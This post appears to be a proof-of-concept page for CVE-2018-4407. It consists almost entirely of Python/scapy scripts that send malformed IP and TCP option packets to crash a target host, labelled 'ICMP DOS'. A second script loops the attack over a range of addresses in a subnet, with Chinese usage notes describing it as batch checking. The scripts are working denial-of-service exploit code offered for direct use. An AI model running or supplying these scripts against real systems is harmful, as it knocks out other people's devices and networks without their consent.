CVE-2018-4407 - co0ontty

CVE-2018-4407 POC

import sys
try:
    from scapy.all import *
except Exception as e:
    print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
    try:
        check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
        print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
        for i in range(8,20):
            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
        print ("[*] Check Over!! ")
    except Exception as e:
        print "[*] usage: sudo python CVE-2018-4407.py 127.0.0.1"

使用循环实现批量检测

POC:

import sys
ip_ori = sys.argv[1]
ip_start = sys.argv[2]
ip_end = sys.argv[3]
from scapy.all import *
for i in range(int(ip_start),int(ip_end)):
    ip = ip_ori+"."+str(i)
    # print (ip)
    print ("Trying CVE-2018-4407 ICMP DOS "+ip)
    for i in range(8,20):
        send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
    print ("[*] Check Over!! ")
    pass

使用方法：
sudo python 4407.py 192.168.100 101 152
使用脚本批量检测 192.168.100 网段 102-152 的 IP